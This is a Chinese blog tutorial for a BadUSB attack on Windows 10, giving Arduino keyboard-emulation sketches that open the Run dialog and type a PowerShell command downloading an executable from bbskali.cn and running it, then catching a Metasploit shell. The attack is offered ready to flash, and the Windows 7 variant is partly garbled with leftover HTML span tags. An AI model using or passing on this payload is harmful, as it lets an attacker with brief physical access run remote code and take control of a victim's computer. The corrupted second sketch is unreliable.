badusb攻擊windows10（msfconsole版）

準備

• badusb
• Arduino

下載軟件

點擊下載

運行軟件

TIM截圖20190305105048.png

在工具菜單中 選擇，選擇badusb的端口和開發版。

TIM截圖20190304122136.png

注入代碼

windows10系統

#include <Keyboard.h>
void setup() {
Keyboard.begin();//開始鍵盤通訊
delay(1000);//延時
Keyboard.press(KEY_LEFT_GUI);//win鍵
delay(500);
Keyboard.press('r');//r鍵
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("powershell -Command $clnt = new-object System.Net.WebClient;$url= 'https://bbskali.cn/8888.exe';$file = ' %HOMEPATH%\\windows.exe ';$clnt.DownloadFile($url,$file);%HOMEPATH%\\windows.exe;");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);

}

void loop()//循環
{
}

Shell

複製

windows7系統

#include <Keyboard.h>

void setup() {//初始化

Keyboard.begin();//開始鍵盤通訊

delay(5000);//延時

Keyboard.press(KEY_LEFT_GUI);//win鍵

delay(500);

Keyboard.press(‘r’);//r鍵

delay(500);

Keyboard.release(KEY_LEFT_GUI);

Keyboard.release(‘r’);

delay(500);

Keyboard.press(KEY_CAPS_LOCK);

Keyboard.release(KEY_CAPS_LOCK);

Keyboard.println(“CMD.EXE /t:01 /k MODE con: cols=16 lines=2”);

delay(1000);

Keyboard.println(“POWERSHELL -cOMMAND $CLNT</span> = NEW-OBJECT sYSTEM.nET.wEBcLIENT;<span class="token variable">$URL= ‘https://bbskali.cn/8888.exe’;$FILE</span> = ' c:\\X.EXE ';<span class="token variable">$CLNT.dOWNLOADfILE($URL</span>,<span class="token variable">$FILE);”);

delay(3000);

Keyboard.println(“C:\X.EXE&EXIT”);

Keyboard.press(KEY_CAPS_LOCK);

Keyboard.release(KEY_CAPS_LOCK);

Keyboard.end();//結束鍵盤通訊

}

void loop()//循環

{

}

Shell

複製

其他代碼

傳送門

編譯上傳

TIM截圖20190304122308.png

成功如下：

TIM截圖20190304122902.png

配置監聽

在msf中我們配置參數，插入badusb即可得到shell,需要注意的是，本代碼僅支持win10對於win7和xp由於不能直接用powershell下載，所以以上代碼不能實現。

---

版權屬於：逍遙子

本文鏈接：https://blog.bbskali.cn/index.php/archives/806/

轉載時須註明出處及本聲明